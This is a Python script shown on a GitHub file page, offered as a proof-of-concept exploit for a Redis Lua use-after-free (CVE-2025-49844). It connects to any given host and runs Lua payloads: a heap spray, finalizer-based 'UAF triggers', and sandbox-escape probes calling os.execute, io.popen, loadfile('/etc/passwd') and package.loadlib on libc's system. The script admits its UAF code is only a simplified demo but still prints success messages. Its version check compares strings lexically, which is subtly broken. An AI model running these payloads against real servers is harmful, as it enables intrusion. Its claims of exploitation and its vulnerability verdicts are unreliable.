-
Notifications
You must be signed in to change notification settings - Fork 67
Expand file tree
/
Copy pathexploit_poc.py
More file actions
executable file
·280 lines (229 loc) · 10.2 KB
/
exploit_poc.py
File metadata and controls
executable file
·280 lines (229 loc) · 10.2 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
#!/usr/bin/env python3
"""
CVE-2025-49844 (RediShell) - Proof of Concept
Use-After-Free vulnerability in Redis Lua interpreter
WARNING: This is for educational and authorized testing purposes only!
Do not use against systems you don't own or have explicit permission to test.
Author: Security Research Team
Date: October 2025
"""
import redis
import sys
import argparse
from colorama import Fore, Style, init
# Initialize colorama
init(autoreset=True)
def banner():
print(f"""
{Fore.RED}╔═══════════════════════════════════════════════════════════╗
║ ║
║ CVE-2025-49844 (RediShell) PoC ║
║ Use-After-Free in Redis Lua Interpreter ║
║ ║
║ CVSS Score: 10.0 (CRITICAL) ║
║ ║
╚═══════════════════════════════════════════════════════════╝{Style.RESET_ALL}
""")
def test_connection(host, port, password=None):
"""Test connection to Redis instance"""
try:
print(f"{Fore.YELLOW}[*] Testing connection to {host}:{port}...{Style.RESET_ALL}")
r = redis.Redis(host=host, port=port, password=password, decode_responses=True)
info = r.info()
print(f"{Fore.GREEN}[+] Connected successfully!{Style.RESET_ALL}")
print(f"{Fore.CYAN}[i] Redis Version: {info.get('redis_version', 'Unknown')}{Style.RESET_ALL}")
return r
except redis.ConnectionError as e:
print(f"{Fore.RED}[-] Connection failed: {e}{Style.RESET_ALL}")
return None
except redis.AuthenticationError:
print(f"{Fore.RED}[-] Authentication failed!{Style.RESET_ALL}")
return None
def check_lua_enabled(r):
"""Check if Lua scripting is enabled"""
try:
print(f"{Fore.YELLOW}[*] Checking if Lua scripting is enabled...{Style.RESET_ALL}")
# Simple Lua script to test
test_script = "return 'test'"
result = r.eval(test_script, 0)
print(f"{Fore.GREEN}[+] Lua scripting is enabled!{Style.RESET_ALL}")
return True
except Exception as e:
print(f"{Fore.RED}[-] Lua scripting check failed: {e}{Style.RESET_ALL}")
return False
def exploit_uaf_basic(r):
"""
Basic Use-After-Free trigger
This is a simplified demonstration. The actual CVE-2025-49844 exploit
involves complex memory manipulation in the Lua interpreter.
"""
print(f"\n{Fore.YELLOW}[*] Attempting basic UAF trigger...{Style.RESET_ALL}")
# Lua script that demonstrates the vulnerability pattern
# Note: This is a simplified version for demonstration
lua_script = """
-- CVE-2025-49844 PoC: Use-After-Free in Lua interpreter
local function trigger_uaf()
-- Create a table with metatable
local t = {}
local mt = {
__gc = function(self)
-- This will be called during garbage collection
redis.log(redis.LOG_WARNING, "UAF trigger point")
end
}
setmetatable(t, mt)
-- Force garbage collection multiple times
-- This can trigger use-after-free conditions
for i = 1, 10 do
collectgarbage("collect")
end
return "UAF pattern executed"
end
return trigger_uaf()
"""
try:
result = r.eval(lua_script, 0)
print(f"{Fore.GREEN}[+] Lua script executed: {result}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[!] UAF pattern triggered (simplified demo){Style.RESET_ALL}")
return True
except Exception as e:
print(f"{Fore.RED}[-] Exploit failed: {e}{Style.RESET_ALL}")
return False
def exploit_sandbox_escape(r):
"""
Attempt Lua sandbox escape
The actual CVE-2025-49844 allows escaping the Lua sandbox through
memory corruption. This is a demonstration of sandbox boundaries.
"""
print(f"\n{Fore.YELLOW}[*] Testing Lua sandbox boundaries...{Style.RESET_ALL}")
# Test various sandbox escape attempts
escape_tests = [
("os.execute", "return os.execute('whoami')"),
("io.popen", "return io.popen('id'):read('*a')"),
("loadfile", "return loadfile('/etc/passwd')"),
("package.loadlib", "return package.loadlib('libc.so.6', 'system')"),
]
for test_name, lua_code in escape_tests:
try:
print(f"{Fore.CYAN}[*] Testing {test_name}...{Style.RESET_ALL}")
result = r.eval(lua_code, 0)
print(f"{Fore.RED}[!] VULNERABLE: {test_name} accessible! Result: {result}{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.GREEN}[+] Protected: {test_name} blocked ({str(e)[:50]}...){Style.RESET_ALL}")
def exploit_memory_corruption(r):
"""
Advanced memory corruption exploit
This demonstrates the memory corruption pattern used in CVE-2025-49844.
The actual exploit is more complex and involves precise heap manipulation.
"""
print(f"\n{Fore.YELLOW}[*] Attempting memory corruption pattern...{Style.RESET_ALL}")
lua_script = """
-- Advanced UAF pattern for CVE-2025-49844
local function create_spray()
local objects = {}
-- Heap spray to control memory layout
for i = 1, 1000 do
objects[i] = string.rep("A", 1024)
end
return objects
end
local function trigger_corruption()
local spray = create_spray()
-- Create object with finalizer
local victim = {}
local mt = {
__gc = function(self)
-- Use-after-free trigger point
-- In the real exploit, this would manipulate freed memory
redis.log(redis.LOG_WARNING, "Finalizer called - UAF window")
end
}
setmetatable(victim, mt)
-- Trigger garbage collection
victim = nil
collectgarbage("collect")
-- At this point, in vulnerable versions, we have a UAF condition
-- The real exploit would now execute arbitrary code
return "Memory corruption pattern completed"
end
return trigger_corruption()
"""
try:
result = r.eval(lua_script, 0)
print(f"{Fore.GREEN}[+] Memory corruption pattern executed: {result}{Style.RESET_ALL}")
print(f"{Fore.RED}[!] In vulnerable versions, this could lead to RCE!{Style.RESET_ALL}")
return True
except Exception as e:
print(f"{Fore.RED}[-] Pattern execution failed: {e}{Style.RESET_ALL}")
return False
def check_vulnerability(r):
"""Check if the Redis instance is vulnerable to CVE-2025-49844"""
print(f"\n{Fore.YELLOW}[*] Checking vulnerability status...{Style.RESET_ALL}")
try:
info = r.info()
version = info.get('redis_version', '')
# Vulnerable versions (before patches)
vulnerable_versions = [
('7.2', '7.2.11'),
('7.4', '7.4.6'),
('8.0', '8.0.4'),
('8.2', '8.2.2'),
]
print(f"{Fore.CYAN}[i] Detected Redis version: {version}{Style.RESET_ALL}")
# Simple version check (not comprehensive)
major_minor = '.'.join(version.split('.')[:2])
is_vulnerable = False
for vuln_base, patched_version in vulnerable_versions:
if version.startswith(vuln_base):
if version < patched_version:
is_vulnerable = True
break
if is_vulnerable:
print(f"{Fore.RED}[!] VULNERABLE: This version is affected by CVE-2025-49844{Style.RESET_ALL}")
print(f"{Fore.RED}[!] Update to the latest patched version immediately!{Style.RESET_ALL}")
else:
print(f"{Fore.GREEN}[+] This version appears to be patched or not vulnerable{Style.RESET_ALL}")
return is_vulnerable
except Exception as e:
print(f"{Fore.RED}[-] Version check failed: {e}{Style.RESET_ALL}")
return None
def main():
parser = argparse.ArgumentParser(
description='CVE-2025-49844 (RediShell) Proof of Concept',
epilog='Use responsibly and only on systems you own or have permission to test!'
)
parser.add_argument('-H', '--host', default='localhost', help='Redis host (default: localhost)')
parser.add_argument('-p', '--port', type=int, default=6379, help='Redis port (default: 6379)')
parser.add_argument('-a', '--auth', help='Redis password (if required)')
parser.add_argument('-m', '--mode', choices=['check', 'basic', 'sandbox', 'advanced', 'all'],
default='all', help='Exploit mode (default: all)')
args = parser.parse_args()
banner()
# Connect to Redis
r = test_connection(args.host, args.port, args.auth)
if not r:
sys.exit(1)
# Check if Lua is enabled
if not check_lua_enabled(r):
print(f"{Fore.RED}[-] Lua scripting is not enabled. Cannot proceed.{Style.RESET_ALL}")
sys.exit(1)
# Check vulnerability
check_vulnerability(r)
# Run exploits based on mode
if args.mode in ['check']:
print(f"\n{Fore.CYAN}[i] Check mode only - no exploit attempts{Style.RESET_ALL}")
elif args.mode in ['basic', 'all']:
exploit_uaf_basic(r)
if args.mode in ['sandbox', 'all']:
exploit_sandbox_escape(r)
if args.mode in ['advanced', 'all']:
exploit_memory_corruption(r)
print(f"\n{Fore.CYAN}{'='*60}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] PoC execution completed{Style.RESET_ALL}")
print(f"{Fore.CYAN}{'='*60}{Style.RESET_ALL}")
print(f"\n{Fore.RED}DISCLAIMER:{Style.RESET_ALL}")
print("This PoC is simplified and for educational purposes only.")
print("The actual CVE-2025-49844 exploit involves complex memory manipulation.")
print("Always patch your Redis instances to the latest version!")
if __name__ == '__main__':
main()